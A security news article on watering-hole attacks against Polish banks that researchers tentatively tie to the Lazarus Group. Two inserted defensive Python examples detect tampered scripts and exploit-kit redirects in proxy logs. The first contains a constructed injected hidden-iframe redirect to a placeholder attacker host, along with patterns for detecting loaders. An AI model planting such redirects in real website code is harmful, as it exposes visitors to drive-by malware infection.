Lazarus mob possibly behind malware attacks against Polish banks

Exploit kit used in Polish attacks found targeting other orgs, too.

David Bisson
@DMBisson

A hacking gang known as the Lazarus Group might be responsible for malware attacks that have targeted Polish banks and other financial organizations.

In early February, the security community first learned of a string of attacks that had targeted at least 20 Polish banks.

Each of the financial institutions found indicators of compromise (IoCs) for a single, previously unknown piece of malware. The available evidence suggests the infections occurred after bank employees visited the website of the Polish Financial Supervision Authority. Investigators believe someone modified a JavaScript (.js) file hosted on the regulator's web server to include malicious code that redirected visitors to an exploit kit, which in turn downloaded a remote access trojan (RAT) onto their machines.
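As an added illustration of the kind of check a site operator could run to catch the tampering described above (this is example code written for this page, not code from the article, Symantec or BAE Systems), the Python below compares a hosted script against a known-good hash and flags loader constructs that reference hosts outside the site's own. The script contents, the first-party host names (example.gov) and the attacker.invalid domain are all constructed placeholders, not indicators from the Polish attacks.

```python
import hashlib
import re
from urllib.parse import urlparse

# Constructed sample: a legitimate first-party script, and the same script with an
# injected iframe redirect appended. The domains are placeholders, not real IoCs.
KNOWN_GOOD_JS = (
    "function initMenu(){document.getElementById('nav').classList.add('ready');}\n"
    "window.addEventListener('load', initMenu);\n"
)
INJECTED_JS = KNOWN_GOOD_JS + (
    "document.write('<iframe src=\"http://attacker.invalid/ek/landing.php\" "
    "width=\"0\" height=\"0\"></iframe>');\n"
)

# Hosts the site's own pages are allowed to load from (placeholder names).
FIRST_PARTY_HOSTS = {"www.example.gov", "static.example.gov"}

# Baseline recorded when the file was last deployed; keep it outside the web root.
BASELINE_SHA256 = hashlib.sha256(KNOWN_GOOD_JS.encode()).hexdigest()

URL_RE = re.compile(r"""https?://[^\s'"<>]+""", re.IGNORECASE)
# Constructs commonly used to pull in a second-stage page: document.write of
# markup, inline iframes, or dynamically created script/iframe elements.
LOADER_RE = re.compile(
    r"document\.write\s*\(|<iframe\b|createElement\s*\(\s*['\"](?:script|iframe)",
    re.IGNORECASE,
)


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()


def foreign_urls(js: str, first_party) -> list:
    """URLs embedded in the script whose host is not on the first-party list."""
    urls = []
    for url in URL_RE.findall(js):
        host = urlparse(url).hostname or ""
        if host not in first_party:
            urls.append(url)
    return urls


def check_script(js: str, baseline_sha256: str, first_party) -> list:
    """Return a list of findings; an empty list means the file matches the
    deployed baseline and contains no loader pointing off-site."""
    findings = []
    if sha256_hex(js) != baseline_sha256:
        findings.append("hash mismatch against deployed baseline")
    urls = foreign_urls(js, first_party)
    if urls:
        findings.append("references foreign hosts: " + ", ".join(urls))
    if urls and LOADER_RE.search(js):
        findings.append("loader construct combined with foreign URL (possible injected redirect)")
    return findings


if __name__ == "__main__":
    for name, body in (("known-good", KNOWN_GOOD_JS), ("tampered", INJECTED_JS)):
        print(name, check_script(body, BASELINE_SHA256, FIRST_PARTY_HOSTS) or ["clean"])
```

The hash comparison alone is enough to catch the modification; the URL and loader checks are there so that the alert says what was injected and where it points, which is what an incident responder needs first.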


Analysis of these infections is ongoing.

Security firm Symantec is one of the companies studying these incidents, and its Security Response researchers were surprised to recognize the exploit kit involved: they had already blocked dozens of attacks by the very same perpetrators against targets in Mexico, Uruguay, and Poland since 2014.

Symantec explains more in a blog post:

“The attackers appear to be using compromised websites to redirect visitors to a customized exploit kit, which is preconfigured to only infect visitors from approximately 150 different IP addresses. These IP addresses belong to 104 different organizations located in 31 different countries. The vast majority of these organizations are banks, with a small number of telecoms and internet firms also on the list.”

Countries in which three or more organizations were targeted by attackers. (Source: Symantec)

Symantec's researchers go on to say they had not previously seen the malware sample delivered by the exploit kit, which goes by the name "Ratankba." But they did recognize a Hacktool that the malware retrieved from its command-and-control (C&C) server.

The tool appears to be the work of Lazarus, a hacking group that has been targeting organizations since at least 2009. Lazarus is best known for preying on institutions in the United States and South Korea, but its activity is global in scope. Some evidence even links Lazarus to the Bangladesh Bank heist of 2016.

Additional analysis by other security firms corroborates Lazarus’ involvement in the Polish malware campaigns. Researchers at BAE Systems, for example, found that one of the samples used in the attacks appears to belong to the threat actor’s toolkit.

Source: BAE Systems

The BAE researchers do not conclusively attribute the attacks to Lazarus, but they say they would not be surprised if the group was behind them. As they observe in an article:

“The technical/forensic evidence to link the Lazarus group actors (who we believe are behind the Bangladesh Bank attack and many others in 2016) to the watering-hole activity is unclear. However, the choice of bank supervisor / state-bank websites would be apt, given their previous targeting of Central Banks for Heists – even when it serves little operational benefit for infiltrating the wider banking sector.”

If Lazarus is responsible for these infections, it is all the more important for organizations to take the IoCs associated with the Polish attacks and update their own defenses. Both Symantec and BAE Systems list those indicators in their respective write-ups of this threat.
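Two checks a bank's security team would actually run over its web-proxy logs, as an added example that is not taken from the article, Symantec or BAE Systems: match requested hosts against a published IoC list, and, independently of any IoC, flag requests that were referred from the regulator's site to a host that site is not known to use. The log format, the client addresses and every host name below (regulator.example, ek-landing.invalid, bank.example) are constructed placeholders rather than the real indicators. The second check matters because, as Symantec notes, the kit serves its payload only to listed source addresses, so a request that came back as a 404 or an empty page is still evidence of the redirect and must not be filtered out on status code.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlparse

# Placeholders: the real indicators are listed in the Symantec and BAE Systems write-ups.
IOC_HOSTS = {"ek-landing.invalid"}
# The compromised site: the referrer a redirect from its pages would carry.
WATERING_HOLE_HOSTS = {"www.regulator.example"}
# Hosts the regulator's pages are known to load resources from, plus our own intranet.
EXPECTED_NEXT_HOPS = {"www.regulator.example", "cdn.regulator.example", "intranet.bank.example"}

# Constructed proxy log: "timestamp client status method url referrer" ("-" = none).
# Line 3 shows the gated exploit kit answering 404 to an address it is not
# configured to infect; the redirect itself is still the signal.
SAMPLE_LOG = """\
2017-02-03T09:14:01 10.1.2.3 200 GET http://www.regulator.example/index.html -
2017-02-03T09:14:02 10.1.2.3 200 GET http://cdn.regulator.example/js/main.js http://www.regulator.example/index.html
2017-02-03T09:14:03 10.1.2.3 404 GET http://ek-landing.invalid/view.php?id=7 http://www.regulator.example/index.html
2017-02-03T09:20:15 10.1.2.9 200 GET http://intranet.bank.example/home http://www.regulator.example/index.html
2017-02-03T09:31:40 10.1.2.7 200 GET http://news.example/article http://news.example/
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\d{3}) (\S+) (\S+) (\S+)$")


def parse_log(text: str) -> list:
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than abort the sweep
        ts, client, status, method, url, ref = m.groups()
        rows.append({
            "ts": datetime.fromisoformat(ts),
            "client": client,
            "status": int(status),
            "method": method,
            "host": urlparse(url).hostname or "",
            "ref_host": "" if ref == "-" else (urlparse(ref).hostname or ""),
        })
    return rows


def detect(rows: list) -> list:
    """Return (rule, client, host) tuples. The status code is deliberately ignored:
    a gated kit returns nothing useful to addresses it does not target."""
    alerts = []
    for r in rows:
        if r["host"] in IOC_HOSTS:
            alerts.append(("ioc_host", r["client"], r["host"]))
        if r["ref_host"] in WATERING_HOLE_HOSTS and r["host"] not in EXPECTED_NEXT_HOPS:
            alerts.append(("unexpected_redirect_from_watering_hole", r["client"], r["host"]))
    return alerts


def clients_to_triage(alerts: list) -> dict:
    """Group alerts by client so each workstation is pulled for forensics once."""
    by_client = defaultdict(set)
    for rule, client, host in alerts:
        by_client[client].add((rule, host))
    return dict(by_client)


if __name__ == "__main__":
    found = detect(parse_log(SAMPLE_LOG))
    for client, hits in clients_to_triage(found).items():
        print(client, sorted(hits))
```

On the constructed log only the 10.1.2.3 workstation is flagged, by both rules; the 10.1.2.9 line shows that a referral from the regulator's site to an expected host is not an alert on its own.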



David Bisson is an infosec news junkie and security journalist. He works as Contributing Editor for Graham Cluley Security News and Associate Editor for Tripwire's "The State of Security" blog.
